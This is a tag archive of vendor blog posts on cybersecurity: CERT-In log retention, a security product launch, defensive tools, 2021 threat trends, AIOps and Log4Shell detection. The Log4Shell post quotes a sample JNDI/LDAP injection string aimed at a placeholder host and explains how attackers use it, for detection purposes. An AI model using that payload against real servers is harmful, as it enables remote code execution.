Tag: cybersecurity

New CERT-In Guidelines: What Does That Mean For You

Posted on by eugene evdokimov

An organization’s security protocols are vital to maintaining transparency, compliance with government regulations, and trust with customers. On April 28, 2022, the Indian Computer Emergency Response Team (CERT-In) released updated directions for compliance requirements for all India-based companies and organizations with Indian clients.

It’s critical to keep in mind that these rules are in place to keep organizations and customers safe from cybersecurity attacks and to see that the correct steps are being taken in a timely manner. 

So what does this mean for you? 

This means you’ll have to retain your log data for 180 days, among a few additional updates, to meet all the Indian Compliance regulation requirements. 

And although this might seem overwhelming and financially burdensome, we’ve got you fully covered on all bases.

Infinite Retention with Coralogix

With growing log volumes and increasingly strict retention regulations, the cost of storing and analyzing them with traditional approaches can be a significant challenge and financial burden. Coralogix uses proprietary Streama© technology to analyze observability data in-stream without relying on indexing or a centralized data store.

This means companies can centralize their observability data and ensure they remain compliant with all local and global security requirements without breaking the bank. 

Directly Query Your Archive

As data enters Coralogix, it is parsed and enriched and then stored in an Amazon S3 archive bucket that you control. This means no matter what level of analysis and monitoring you need, you always maintain full access to your data – for as long as you need it. Configure your bucket to reside in AWS’s Mumbai region with 180-retention for compliance with the updated CERT-In directive.

Query your archive directly from the Coralogix UI or via CLI with no additional compute cost or impact on your daily quota. Data can then be easily exported for an audit or reindexed to the Coralogix platform for investigation.

Extract Insights Without Indexing

Part of what sets the Coralogix platform apart is the ability to extract infinite value from your data without ever needing to index it.

Use the Logs2Metrics feature to generate metrics on the fly from your logs and send the raw log data directly to your archive. The metrics are stored for a full year for visualization and alerting at no additional cost, and the raw data can be accessed directly from your archive at any time. Advanced alerting with dynamic thresholds, log clustering, and anomaly detection can all also be leveraged without indexing.

This means that you can monitor your data with more precision, better performance, and at a much lower cost.

Optimize Your Total Cost of Ownership (TCO)

As data volumes continue to grow, costs typically increase as well. We understand different data is used for different goals. That’s why with our technology, you can designate the data to different analytics pipelines by use case, allowing you to reduce costs while maintaining system visibility.

Use our TCO Optimizer to prioritize your data to 1 of 3 data pipelines according to your analytics and monitoring needs so that you pay based on the value of your data rather than volume.  

Compliance Pipeline: Within this pipeline, you can store data that’s needed for compliance purposes. Data in this pipeline is written to your own archive bucket after passing through the parser, enrichment, and Live Tail. It can still be queried at any time, without counting against the quota, ensuring you meet all the CERT-In guidelines. 

Monitoring Pipeline: Any data that needs to be visualized, tracked, alerted, and monitored in real-time will flow in the log monitoring pipeline. Within the pipeline, you can leverage the Logs2Metrics, Alerting, and Anomaly Detection features without ever needing to index the raw log data.

With these features, you’ll be able to quickly and easily identify security risks before they affect your business or customers. Remember that according to the new directions, you will need to report them to CERT-In within 6 hours. 

Frequent Search Pipeline: Any data queried frequently for investigations or troubleshooting, critical or error level logs, for example, can be sent to the Frequent Search pipeline. In addition to the advanced features in the Monitoring pipeline, this data will be indexed and put in hot storage to enable lightning-fast queries.

Between all three pipelines, you have full control over where to place your data, access to all Coralogix features for all users, and have fully optimized costs with no surprises.

Regardless of which pipeline your data is sent to, all of it will be stored in your archive bucket, so you ALWAYS have full access and control in compliance with government regulations. 

Where Do Things Currently Stand

All in all, no matter which pipelines your data is in, ALL DATA is accessible from the archive regardless of indexing and retention. Rest assured, you can easily retain all your logs for 180 days (or however long you want), maintain full oversight of your system’s health, work with a cost-effective solution, and meet full compliance requirements. 

Learn more about the Coralogix platform or request a demo at any time for a personalized walkthrough! 

We’re Making Our Debut In Cybersecurity with Snowbit

Posted on by eugene evdokimov

2021 was a crazy year, to say the least, not only did we welcome our 2,000th customer, we announced our Series B AND Series C funding rounds, and on top of that, we launched Streamaⓒ – our in-stream data analytics pipeline.

But this year, we’re going to top that!

We’re eager to share that we are venturing into cybersecurity with the launch of Snowbit! This new venture will focus on helping cloud-native companies comprehensively manage the security of their environments.

As you know, observability and security are deeply intertwined and critical to the seamless operation of cloud environments. Post becoming a full-stack observability player with the addition of metrics and tracing, it was natural for us to delve deeper into cybersecurity.

So what are we trying to solve?

Today we are witnessing accelerated cybersecurity risks with the online explosion post the onset of the pandemic. The acute global scarcity of cybersecurity talent has aggravated the situation as most organizations are unlikely to have adequately staffed in-house security teams over the medium term. They are just too expensive, difficult to hire and keep updated.

As Navdeep Mantakala, Co-founder of Snowbit says, “Rapidly accelerating cyberthreats are leaving many organizations exposed and unable to effectively deal with security challenges as they arise. Snowbit aims to address fundamental security-related challenges faced today including growing cloud complexity, increasing sophistication of attacks, lack of in-house cybersecurity expertise, and the overhead of managing multiple point security solutions.”

What is also adding to the challenge is the increasing leverage of the cloud, both multi-provider infrastructure and SaaS, which is dramatically broadening the attack surface and complexity. Leverage of multiple point solutions to address specific use cases are only increasing the operational overhead.

How are we solving it?

Snowbit’s Managed Extended Detection and Response (MxDR) incorporates a SaaS platform and expert services. The platform gives organizations a comprehensive view of their cloud environment’s security and compliance (CIS, NIST, SOC, PCI, ISO, HIPAA). 

The Snowbit team will work to expand on the existing capabilities of the Coralogix platform, so that all data will be used to identify any abnormal activity, configurations, network, and vulnerability issues. This is rooted in the idea that every log can and should be a security log. Furthermore, it will automate threat detection and incident response via machine learning, an extensive set of pre-configured rules, alerts, dashboards, and more. 

The MxDR platform deploys a team of security analysts, researchers, and DFIR professionals stationed at Snowbit’s 24×7 Security Resource Center. There, they provide guided responses to enable organizations to more decisively respond to threats detected in their environment.

“Observability forms the bedrock of cybersecurity, and as a result, Snowbit is strategic for Coralogix as it enables us to offer a powerful integrated observability and security proposition to unlock the value of data correlation,” said Ariel Assaraf, CEO of Coralogix. “Snowbit’s platform and services enable organizations to overcome challenges of cybersecurity talent and disparate tools to more effectively secure their environments.”

With Snowbit, we have the vision to empower organizations across the globe to quickly, efficiently, and cost-effectively secure themselves against omnipresent and growing cyber risks. Snowbit is looking to offer the broadest cloud-native managed detection and response offering available to enable this. 

Make sure to sign up for updates so you can get notified once Snowbit launches. 

5 Cybersecurity Tools to Safeguard Your Business

Posted on by eugene evdokimov

With the exponential rise in cybercrimes in the last decade, cybersecurity for businesses is no longer an option — it’s a necessity. Fuelled by the forced shift to remote working due to the pandemic, US businesses saw an alarming 50% rise in reported cyber attacks per week from 2020 to 2021. Many companies still use outdated technologies, unclear policies, and understaffed cybersecurity teams to target digital attacks.

So, if you’re a business looking to upgrade its cybersecurity measures, here are five powerful tools that can protect your business from breaches.

1. Access Protection

Designed to monitor outgoing and incoming network traffic, firewalls are the first layer of defense from unauthorized access in private networks. They are easy to implement, adopt, and configure based on security parameters set by the organization.

Among the different types of firewalls, one of the popular choices among businesses is a next-generation firewall. A next-generation firewall can help protect your network from threats through integrated intrusion prevention, cloud security, and application control. A proxy firewall can work well for companies looking for a budget option.

Even though firewalls block a significant portion of malicious traffic, expecting a firewall to suffice as a security solution would be a mistake. Advanced attackers can build attacks that can bypass even the most complex firewalls, and your organization’s defenses should catch up to these sophisticated attacks. Thus, instead of relying on the functionality of a single firewall, your business needs to adopt a multi-layer defense system. And one of the first vulnerabilities you should address is having unsecured endpoints.

2. Endpoint Protection

Endpoint Protection essentially refers to securing devices that connect to a company’s private network beyond the corporate firewall. Typically, these range from laptops, mobile phones, and USB drives to printers and servers. Without a proper endpoint protection program, the organization stands to lose control over sensitive data if it’s copied to an external device from an unsecured endpoint.

Softwares like antivirus and anti-malware are the essential elements of an endpoint protection program, but the current cybersecurity threats demand much more. Thus, next-generation antiviruses with integrated AI/ML threat detection, threat hunting, and VPNs are essential to your business.

If your organization has shifted to being primarily remote, implementing a protocol like Zero Trust Network Access (ZTNA) can strengthen your cybersecurity measures. Secure firewalls and VPNs, though necessary, can create an attack surface for hackers to exploit since the user is immediately granted complete application access. In contrast, ZTNA isolates application access from network access, giving partial access incrementally and on a need-to-know basis. 

Combining ZTNA with a strong antivirus creates multi-layer access protection that drastically reduces your cyber risk exposure. However, as we discussed earlier, bad network actors who can bypass this security will always be present. Thus, it’s essential to have a robust monitoring system across your applications, which brings us to the next point…

3. Log Management & Observability

Log management is a fundamental security control for your applications. Drawing information from event logs can be instrumental to identifying network risks early, mitigating bad actors, and quickly mitigating vulnerabilities during breaches or event reconstruction.

However, many organizations still struggle with deriving valuable insights from log data due to complex, distributed systems, inconsistency in log data, and format differences. In such cases, a log management system like Coralogix can help. It creates a centralized, secure dashboard to make sense of raw log data, clustering millions of similar logs to help you investigate faster. Our AI-driven analysis software can help establish security baselines and alerting systems to identify critical issues and anomalies. 

A strong log monitoring and observability system also protects you from DDoS attacks. A DDoS attack floods the bandwidth and resources of a particular server or application through unauthorized traffic, typically causing a major outage. 

With observability platforms, you can get ahead of this. Coralogix’s native Cloudflare integrations combined with load balancers give you the ability to cross-analyze attack and application metrics and enable your team to mitigate such attacks. Thus, you can effectively build a DDOS warning system to detect attacks early.

Along with logs, another critical business data that you should monitor regularly are emails. With over 36% of data breaches in 2022 attributed to phishing scams, businesses cannot be too careful.

4. Email Gateway Security

As most companies primarily share sensitive data through email, hacking email gateways is a prime target for cybercriminals. Thus, a top priority should be robust filtering systems to identify spam and phishing emails, embedded code, and fraudulent websites. 

Email gateways act as a firewall for all email communications at the network level — scanning and auto-archiving malicious email content. They also protect against business data loss by monitoring outgoing emails, allowing admins to manage email policies through a central dashboard. Additionally, they help businesses meet compliance by safely securing data and storing copies for legal purposes. 

However, the issue here is that sophisticated attacks can still bypass these security measures, especially if social engineering is involved. One wrong click by an employee can give hackers access to an otherwise robust system. That’s why the most critical security tool of them all is a strong cybersecurity training program.

5. Cybersecurity Training

Even though you might think that cybersecurity training is not a ‘tool,’ a company’s security measures are only as strong as the awareness among employees who use them. In 2021, over 85% of data breaches were associated with some level of human error. IBM’s study even found out that the breach would not have occurred if the human element was not present in 19 out of 20 cases that they analyzed.

Cybersecurity starts with the people, not just the tools. Thus, you need to implement a strong security culture about security threats like phishing and social engineering in your organization. All resources related to cybersecurity should be simplified and made mandatory during onboarding. These policies should be further reviewed, updated, and re-taught semi-annually in line with new threats. 

Apart from training, the execution of these policies can mean the difference between a hackable and a secure network. To ensure this, regular workshops and phishing tests should also be conducted to identify potential employee targets. Another way to increase the effectiveness of these training is to send out cybersecurity newsletters every week. 

Some companies like Dell have even adopted a gamified cybersecurity training program to encourage high engagement from employees. The addition of screen locks, multi-factor authentication, and encryption would also help add another layer of security. 

Upgrade Your Cybersecurity Measures Today!

Implementing these five cybersecurity tools lays a critical foundation for the security of your business. However, the key here is to understand that, with cyberattacks, it sometimes just takes one point of failure. Therefore, preparing for a breach is just as important as preventing it. Having comprehensive data backups at regular intervals and encryption for susceptible data is crucial. This will ensure your organization is as secure as your customers need it to be —  with or without a breach!

Cyber Security in 2021 – What Happened?

Posted on by eugene evdokimov

2021 was quite a year. Some things changed, and some things very much stayed the same. The world of cyber security was not immune to this zeitgeist, with some aspects of the threat landscape persisting and some rapidly changing and evolving. 

This piece will examine the key trends in the cybersecurity threat landscape that we saw over the last year. Covering topics from trojans to the pandemic, and everything in-between, by the end of this article, you should have a strong understanding of what happened in 2021. You might even feel better equipped to deal with 2022.

COVID-19

Unfortunately, COVID-19 is something that didn’t leave our shores for good in 2021. While the world continued to recover from the worst pandemic in a century, COVID-19 brought its own challenges for the cyber security industry and its practitioners. 

The pandemic and shift to working from home presented challenges for organizations’ infosec teams. With phishing scams and their success on the rise, employers had to deliver more advanced training on social engineering scams. The lack of a traditional office environment was compounded by the lack of a traditional office. People who previously would have “sense-checked” an email with a colleague before opening it.

A further challenge that COVID-19 presented in 2021 was that many organizations, particularly small and medium-sized businesses, didn’t have the resources to kit out their employees with secure and vetted laptops for home working. Consequently, companies worldwide introduced ‘bring your own device’ policies for home working. 

This, in conjunction with the rise in the efficacy of phishing scams, necessitated a heightened approach to endpoint monitoring, something that many companies are still on the road to adopting. In 2021, the average cost of an end-point security breach was close to $9.5million, so organizations with effective observability strategies and endpoint monitoring were well-positioned for COVID-19 from a security perspective. 

Insider Threats

While a Deloitte study indicated that the working from home conditions caused by the pandemic increased the risk of malicious insider threats, risks presented by other types of insider threats were also on the rise in 2021.

Misconfigured systems are a vital risk element of insider threats, and they aren’t always there maliciously. Human error is a far greater cause of security incidents and data breaches than those perpetrated by hackers. 

In early 2021, the Brazilian branch of Experian, Serasa, experienced the leak of 220 million individuals’ personal data. While the investigation is still ongoing, early signs indicate that this resulted from an insider threat. Sadly for Experian, it isn’t the first time they have been the victims of a significant data breach.

Even companies like Peloton, who saw massive success owing to the pandemic, were not immune from insider threats. While it doesn’t appear to have been malicious, a misconfigured API gave anyone the ability to access users’ data. While Peloton protests that no one maliciously accessed this API, it’s another example of how insider threat, malicious or not, has the potential to open up a raft of problems for an organization. 

Practices like GitOps and embedding observability practices in your development pipeline are great ways of ensuring that you don’t overlook the obvious when configuring new features or setting security policies. This will help stop you from falling victim to the “unintentional” or engineered insider threat.

The Return of the Trojan

Before the beginning of 2021, it seemed like trojan attacks had become somewhat passé, lost to the days of the early to mid-noughties and replaced by the much more fashionable ransomware. Unfortunately, the Solarwinds attack changed that, at least temporarily. 

While the actual Solarwinds attack happened in 2020, most of the impact was felt in 2021. Essentially, hackers could inject malicious code into Solarwinds applications that shipped to customers, who were vulnerable due to the compromised software. This particular attack gained a large amount of publicity because of the caliber of Solarwinds’ customers, ranging from the US government to Microsoft. 

While it’s common in security companies’ marketing to see rhetoric around how long a hacker resides in your system, the Solarwinds attack was living proof of that. Investigations indicate that Solarwinds pushed patches and updates with compromised code to their customers as early as March 2020. The nature of the malware was so sophisticated that not only did it go undetected for such an extended period, but it also gave the hackers the ability to access users’ systems and install even more malware and exfiltrate data. 

A year on from the Solarwinds announcement, we have yet to hear the full extent of who and what was affected. It has raised the profile of these “supply chain attacks,” which target a trusted vendor and use their relationship with their customer network to distribute malware and exfiltrate data. It’s also made organizations challenge their traditional vendor relationships and look in-house or to systems integrators to build out tools. 

How can you stop yourself from falling victim to another Solarwinds-type attack? Well, one option is to build everything in-house. However, if Microsoft isn’t doing that, it might be a little unrealistic. You can use cross-system observability to detect supply chain attacks earlier and minimize the subsequent damage. Are you using machine learning to baseline standard network traffic across your load-balancers to identify anomalous behavior better? Maybe you should. 

Hybrid Cloud

From a technologist’s perspective, it certainly feels like 2021 was the year of the hybrid cloud. COVID-19 certainly had a role in that, but several other factors drove businesses towards a hybrid cloud in 2021. Chief among them is companies are increasingly adopting open standards to avoid vendor lock-in.

However, with hybrid cloud adoption comes a new range of threats and a new attack vector for many organizations. Previously on-premise companies will have to grapple with cloud security principles, which will bring their challenges and risks. Businesses will have to adopt containerization technology to effectively use hybrid cloud, which again carries its own security considerations. 

It’s not just threats, though. Hybrid cloud presents real opportunities for innovation in cyber security. Public cloud can be used as a vault for ransomware protection (see the section below for more) or simply as a DR datacenter. These new architectures mean even smaller businesses can take advantage of the scalability and elasticity of the cloud for cyber security use cases.

Hybrid cloud security is an area where observability is vital. The ability to homogenize metrics, alerts, and triggers across your entire estate (on-prem and in the cloud) is invaluable in maintaining a healthy and protected infrastructure. 

Ransomware

It wouldn’t be a cyber security blog without talking about ransomware, would it? It’s estimated that ransomware has cost companies and individuals $6 trillion in 2021, which is a staggering figure. Ransomware dominated the news in 2021, and that’s because its victims were mainly government institutions or household brands.

Surprisingly, financial services businesses received fewer successful cyber attacks than any other major industry. That’s not to say that they weren’t targeted, but it likely speaks to the enhanced security procedures banks and insurance companies have in place specifically to deal with ransomware. 

As ransomware dominated the news, our inboxes, webinars, and LinkedIn targeted adverts followed suit with a range of recommendations, promises, and statistics about how to prevent it. But what do we know about preventing ransomware attacks? 

You need an effective malware detection system and firewall, you need zero-trust networking, you need backups and fast recovery capabilities, and you need immutability. Stringing these together in a clever way, using automation, or making the best of hybrid cloud will undoubtedly help, but one key component will make a real difference. 

The ability to visualize and monitor all of the components mentioned above on a single pane of glass is vital. Think of it as your ransomware dashboard. Having an observability platform that shows you if you’re protected, what your most recent valid backup is, and what your RPO will be.

Log4j

A pervasive known vulnerability spanning every industry and touching most companies certainly wasn’t an ideal end to 2021. 

The log4j vulnerability was made public in December 2021, and it had everyone refactoring their code, releasing urgent patches, and questioning their use of libraries in production code. We still don’t know the worldwide effect of the log4j vulnerability, and it may take some time for that to become clear. Some early victims, such as the Belgian Defense Ministry, have already emerged. More will undoubtedly follow.

What we do know is this – organizations’ use of libraries in production code will be reviewed. Also, SRE teams need to think about their ability to push fixes rapidly and roll back releases. We mentioned combining GitOps and observability above, but if there was ever a compelling reason to act, log4j was it. 

So how do we have a better 2022?

This article may seem like the cyber security world was largely on fire in 2021. Not true. There were victims of all of the key trends mentioned above, and trillions of dollars will have been spent, paid, or fined as a result. But not every company was a victim to these threats, and those that aren’t are either lucky or doing things differently. It’s difficult to prescribe luck, but at Coralogix, we can offer a different approach.

By taking a holistic view of security underpinned by a leading observability platform, you can monitor and observe what’s going right and what might be going wrong at all times in your infrastructure. Sometimes you need to zoom out to deal with the problem effectively, and Coralogix gives you the ability to do just that. 

Harnessing AIOps to Improve System Security

Posted on by eugene evdokimov

You’ve probably seen the term AIOps appear as the subject of an article or talk recently, and there’s a reason. AIOps is merging DevOps principles with Artificial Intelligence, Big Data, and Machine Learning. It provides visibility into performance and system data on a massive scale, automating IT operations through multi-layered platforms while delivering real-time analytics.

In short, it’s a movement away from siloed operations data to a holistic approach that encompasses system-wide analysis and management from a single ML-integrated platform.

As you can imagine, AIOps has multiple system security and resilience benefits. One of the reasons the AIOps movement is gaining such momentum is that an AIOps based approach has already significantly enhanced system security and resilience.

Why do businesses want the enhanced security of an AIOps based infrastructure?

The risk of attack from cybersecurity threats has never been higher. You’re undoubtedly aware of the many high-profile cyberattacks and data breaches that have occurred in the last few years.

There is a reason Joe Biden signed an executive order in early 2021 mandating cybersecurity best practices for US government bodies. By 2025 cybercrime will cost the global economy $10.5 trillion per year. In the US, a cyberattack occurs every 39 seconds. It’s not if your systems are attacked, it’s when.

The cost of cyberattacks to your business

The costs of cyberattacks to your business are astronomical. One of the most high-profile recent cybersecurity incidents was the Colonial Pipeline ransomware attack of May 2021. The security breach by hacker group DarkSide cost the Colonial Pipeline Company an estimated minimum of $5 million.  

Small businesses aren’t immune, either. The average setback for small businesses that experience a cyberattack is $25,000. No matter the size of your systems, more and more organizations are waking up to the reality that system security cannot be low-priority.

How AIOps improves system security

To understand how AIOps can apply to system security, you’ll have to understand the basics of how AIOps works.

Enterprise systems are multi-surfaced, multi-dimensional beasts – they’re complex. Keeping them secure requires a different approach than methodologies rooted in monolithic systems, such as SIEM.

The AIOps manifesto sums up the AIOps method best with the five dimensions of AIOps:

Data set selection

To respond to security threats in real-time means acting fast. That’s why data set selection is a cornerstone of AIOps secured systems.

Modern systems generate a lot of data noise. Many hackers and cybercriminals exploit this to slip into your systems undetected, blending in with the daily data traffic. Machine Learning algorithms in an AIOps platform parse the data noise at an immense scale.

Your ops and security teams can easily find and neutralize threats and trace their movements back to the penetration point. AIOps platforms create clean, curated data samples. The result removes the need for your ops/security teams to sift through terabytes of non-essential data noise to isolate threats or carry out root cause analysis.

Pattern discovery

Not only does an AIOps platform remove the need to curate data manually, but it also automates pattern discovery within the data sets it presents. An AIOps platform provides your ops/security teams with only relevant data, but it also explains why that data matters.

Pattern discovery uses a range of ML techniques to extract patterns from curated data. In a security context, this could mean anything from highlighting unauthorized packets during a DDoS attack to flagging which company email accounts open high volumes of virus-containing spam.

Inference

The inference is at the heart of what makes advanced Machine Learning so, well, progressive. AIOps makes full use of inference algorithms to deliver secure systems.

The ability to infer meaning from discovered patterns allows for highly complex alerts and an unparalleled level of insight from analytics, even in real-time.

‘Inference engines’ operate much like white blood cells. They remember threats, except instead of storing viral DNA, they remember patterns and anomalous data in the endless data noise your AIOps platform parses every second. When suspicious patterns or activity are identified, the algorithms in the AI can provide alerts that contain not only the nature of the threat but a recommended response based on previous events.

And thanks to the broader AIOps and cybersecurity communities, new use cases are implemented into the platform through automated updates. AIOps platforms can infer insight based on attacks that have occurred anywhere, not just within your systems.

Communication

Communication in an AIOps context translates to intuitiveness and ease of use. One key setback of early cybersecurity technologies was their complexity. There is a reason cybersecurity specialists are amongst the highest-paid IT professionals.

AIOps platforms have ease-of-use built-in as a core principle. If an AIOps platform cannot communicate its findings to a human engineer, its objectives have failed. Visualization, natural language summaries, and streamlined alerts and reporting are essential for a successful AIOps platform.

However, communication doesn’t just encompass AI and the human engineers who operate it. As with all modern technologies, AIOps platforms receive regular automated updates and maintenance. This includes other instances of the same platform, creating an “attack one of us, attack all of us” level of defense, which makes the lives of cybercriminals incredibly difficult.

Automation

Last but never least, we have the modern IT operations essential; automation.

We don’t need to explain to you exactly why automation is beneficial by this point. Modern systems are complex and change fast (mainly because of automation, in many cases). Modern security systems need to match this pace.

Automation is how AIOps manage to stay on top of fluid multidimensional attack surfaces and keep them secure. Every feature of the AIOps platforms we’ve mentioned is fully automated. That’s what makes them so strategically valuable: they allow cybersecurity teams to combat and protect against threats by removing the excessive manual efforts needed to find and isolate them.

AIOps cybersecurity use cases

The above explains how AIOps methodology fits into the context of system security. However, this doesn’t give much practical information about adopting AIOps into your cybersecurity strategy. Many organizations are already keeping their systems secure with AIOps platforms. Several use cases perfectly illustrate how AIOps-based security looks on the ground.

Ransomware and malware detection

The Colonial Pipeline attack was perhaps the most notorious use of ransomware in recent years. However, ransomware and malware attacks are still among the most common cybersecurity threats.

It’s estimated that ransomware/malware will cost the US economy $20billion in 2021. 39% of businesses attacked by ransomware end up paying ransom demands. It’s not a threat that should be taken lightly, even if you believe your business has no data or online assets worth ransoming. AIOps keeps hundreds of companies secure from this common yet incredibly dangerous threat.

The most dangerous ransomware/malware are variants whose signatures are unknown to the broader cybersecurity community (and the systems they update and operate). Automated large-scale event processing, pattern recognition, and ML inference make detecting malware or ransomware much easier. Even new variants.

ML algorithms can pinpoint new malware/ransomware variants based on behavior. In the simplest terms, AIOps platforms can adopt an “if it walks like a duck…” approach. This is much more effective than platforms that simply sweep systems for malicious code matching existing use case libraries.

Fraud detection

Malware and viruses aren’t the only cybersecurity threats faced by modern enterprises. Fraud detection is a crucial feature of your security approach, too. Especially in financial sectors such as banking and insurance, fraud detection has become essential for many IT operations and cybersecurity teams.

AIOps is proving incredibly valuable in this arena. Fraud detection involves a lot of inputs and data types, and all run through intensive processing, including anomaly detection, text mining, database searches, and social network analysis. These all then have to be combined with predictive models so that thorough fraud detection can become effective fraud prevention.

Automating all of this data wrangling has become indispensable for many organizations in the financial sector. Every year fraudulent actors become more advanced in their techniques. The automated and self-learning processes of AIOps platforms provide robust protection against the ever-changing threat landscape of modern fraud.

AIOps is already proving its worth by applying the five dimensions to fraud detection functionality in platforms. This was demonstrated perfectly in 2020 AIOps, and ML-supported fraud detection uncovered an extensive and sophisticated phishing scam network targeting Microsoft 365 users.

Endpoint and network behavior modeling

A security platform that can isolate attack indicators isn’t much use after the fact. Unfortunately, creating behavior models for endpoints and networks that preempt system compromising breaches is time-consuming and complex.

This is where AIOps has allowed operations and security teams to make incredible strides. Using Machine Learning and automation-enabled big data parsing and analytics, AIOps platforms can generate complex behavior models. As this is automated and incorporates advanced pattern recognition and inference algorithms, AIOps platform-generated behavior models are not only delivered faster. With significantly less manual input, they’re also, generally speaking, better.

These endpoint and network behavior models can detect much subtler indicators of an attack or a data breach than their manually coded counterparts. This allows your teams to react much faster, isolating suspicious behaving endpoints or flagged traffic before they become your organization’s latest data breach or cyberattack.

Security event management

As established, a great bulk of your security and operations team’s time can be lost parsing through the endless reams of data your systems generate. Logs and event data mount up fast. To respond effectively, your teams must spot indicators and patterns within vast data sets. The sheer scale of this task, especially in complex modern systems, makes AI-assisted security event management not only sensible in 2021 but almost a requirement.

Simply put, there is so much data noise in modern systems that it’s becoming unreasonable for humans to manage their security manually. AIOps uses machine learning to cut through the data noise and make effective security management a reality again.

AIOps platforms allow for intelligent decision-making and alerting configurations in a way that doesn’t burn out your security and operations staff. It will enable them to be everywhere at once, know where they’re needed, and understand what’s required there without countless hours pouring through logs and event data.

Threat intelligence analysis

It is threat intelligence that encompasses everything an AIOps platform can achieve for your system security.

AIOps platforms provide a greater level of intelligence, system visibility, and real-time analytics than many other security solutions. Due to the sheer scale of data, an AIOps platform can parse, analyze, and provide intuitive insight that allows your operations/security teams a more precise level of threat intelligence than ever before.

Whether it’s identifying impending attacks before data is breached or system-wide security event management that includes cloud-based components, AIOps platforms enable threat intelligence analysis fit for the ever-changing cybersecurity landscape of the 21st century.

Adopting an AIOps security model with the Coralogix platform

We’ve already established that failing to invest in robust security for your systems creates more costs than saves. If you haven’t recently updated your cybersecurity policies, there has never been a better time. If you’re convinced that the AIOps model is the way forward for your organization, the Coralogix platform is what you need.

Our platform is designed from the ground up to enable organizations to analyze data at the scale needed for a fully AIOps security strategy. Our platform’s machine learning algorithms can analyze 100 million logs plus a day. They’re both powerful and intelligent enough to support pattern discovery as outlined in our AIOps security use cases.

What’s more, our dynamic alerting system uses ML to adjust thresholds responsively to the data processed by the platform. This makes it easier for your security and operations teams to ensure no threat remains undetected and malicious users are detected in record time.

These are just some of the ways our existing users have leveraged the Coralogix platform to keep their systems secure. Get in touch if you’re ready to harness AIOps to increase your system security.

How to Detect Log4Shell Events Using Coralogix

Posted on by eugene evdokimov

What is Log4Shell?

The Log4J library is one of the most widely-used logging libraries for Java code. On the 24th of November 2021, Alibaba’s Cloud Security Team found a vulnerability in the Log4J, also known as log4shell, framework that provides attackers with a simple way to run arbitrary code on any machine that uses a vulnerable version of the Log4J. This vulnerability was publicly disclosed on the 9th of December 2021.

One of the interesting things about this vulnerability is that it has existed in the code since 2013 and, as far as we know, was not noticed for eight long years.

The way this kind of attack works is straightforward. The attacker needs to know which data in a given application they have control over, as the user, which will eventually be logged. Using that information, the attacker can send a simple text line like ${jndi:ldap://example.com/file} to that field. When the server sends that string to the logger, it will attempt to resolve that string by connecting to an LDAP server at the address ‘example.com.’ 

This will, of course, cause the vulnerable server to use its DNS mechanism to resolve that address first. Therefore, allowing attackers to do a “carpet bombing” and send many variations of this string to many fields, like the “UserAgent” and “X-ForwardedFor” headers. In many cases, the attacker would use the JNDI string to point the vulnerable server to an LDAP server at an address like <the victim’s domain name>.<the field used to attack>.<a random text used as the attack’s ID>.<attacker controlled domain>.

By doing so, the attacker, who has control over the authorized DNS server for his domain, can use this server’s logs to build an index of all domain names and IP addresses that are vulnerable to this kind of attack. This also includes which field is the one vulnerable to it.

More than a single way to detect it

Logs, logs, and more logs

Coralogix, unlike many traditional SIEMs, was not built to hold only “security-related events” (if that is even a thing) but rather to hold any type of textual data. This means that in most cases, it contains all the information and tools that you’ll need to detect security threats without having to do anything special except for creating simple alerting rules.

If you, like many of our customers, are sending your applications and servers logs to Coralogix, you can simply search for the string “JNDI” in your Internet-facing applications’ logs. If you find something like this, you should take a deeper look:

Coralogix logs

By simply clicking the “fwd” field and selecting “show graph for key,” you’ll see something that looks like this (all the masked items contained IPv4 addresses or comma-separated lists of IP addresses):

Field Visualization

That certainly looks suspicious. If you follow our recommendation to create a NewValue alert that will fire for every new value in that field that does not match the expected pattern (a collection of numbers, dots, and commas), then Coralogix will alert you about the attempt even before the attack was publicly disclosed. This includes even if the communication to the vulnerable service was encrypted.

Coralogix STA – Passive Mode

With Coralogix STA (Security Traffic Analyzer) installed, you’ll be able to dig even deeper. The STA allows you to analyze the traffic to and from EC2 interfaces and get all the essential information from it as logs in Coralogix. In this case, if the traffic to the server contained an attempt to exploit the Log4Shell vulnerability and it was not encrypted (or if it was encrypted but the STA’s configuration contained the key used to encrypt the traffic), Coralogix will automatically detect that and issue the following alert:

Coralogix Security Traffic Analyzer

Suppose the communication to the vulnerable server is encrypted, and the STA doesn’t have the appropriate key to decipher it. In that case, Suricata won’t be able to detect the JNDI payload in the traffic, and such alerts won’t fire. But even if you don’t send your application logs to Coralogix and the traffic to the Internet-facing service is encrypted, still not all is lost.

Coralogix might not be able to detect the attack before it starts, but the Coralogix STA can still detect the attack while it is in progress. As you may have already noticed, the way this vulnerability works is that the attacker will cause the server to contact an external server using the LDAP protocol, which will cause the server to create a DNS request. That DNS request will not be encrypted even if the connection to the server was.

This allows the STA to detect the call to the attacker’s command and control server, which can result from a Log4Shell attack but can detect other types of attacks.

Because this communication pattern contains a random string (the attack ID), it is most likely to get a relatively low NLP-based score. The queried domain name will be rather long, which will trigger the alert about suspicious domain names (that are both long but have a low NLP score). In addition to that, the relatively high number of such unique requests will probably trigger a Zeek notice about an increased number of unique queries per parent domain.

Coralogix STA – Active Mode

Another option to detect this vulnerability is by deploying Wazuh agents on critical servers and connecting them to the STA. The Wazuh agent will automatically pull the list of all installed software packages on the host and forward it to the STA, checking that information against a list of vulnerabilities published by NIST, RedHat, and Canonical. Also, Wazuh can be instructed to run an executable and parse its output. By configuring Wazuh to run a tool such as Grype, which analyses the library dependencies of every software it checks, it is possible to detect vulnerable software even before the first exploit attempt.

Some more logs…

Since outbound connections using the LDAP protocol are usually not allowed in corporate environments, the service will eventually fail to reach the relevant server. This will lead to many exceptions that will be logged as part of the service logs and will most likely cause a flow anomaly alert to fire in Coralogix.

Summary

Coralogix makes it possible to easily detect and investigate Log4Shell cases by either ingesting application, infrastructure, or STA logs. By combining this with an XSOAR integration, it is possible to take actions based on this detection and help prevent the attack from spreading.

What You Can Learn About Cyber Security from the Biggest Breaches in History

Posted on by eugene evdokimov

It feels like cybersecurity is dominating the newsfeeds, doesn’t it? There is a reason.

Cyberattacks and cybercrime have risen dramatically in the last five years. 2020 broke all records in terms of data loss and the number of cyberattacks. Between 2019 and 2020 ransomware attacks alone rose by 62%, the same year that the World Economic Forum identified cyberattacks and data theft as two of the biggest risks to the global economy.

Suffice to say, the reason there’s a lot of chatter is that organizations are waking up to what cybersecurity professionals have been saying for years: cybersecurity should always be the top priority.

Cybercriminals in 2021: Hitting harder, faster, and more frequently than ever before.

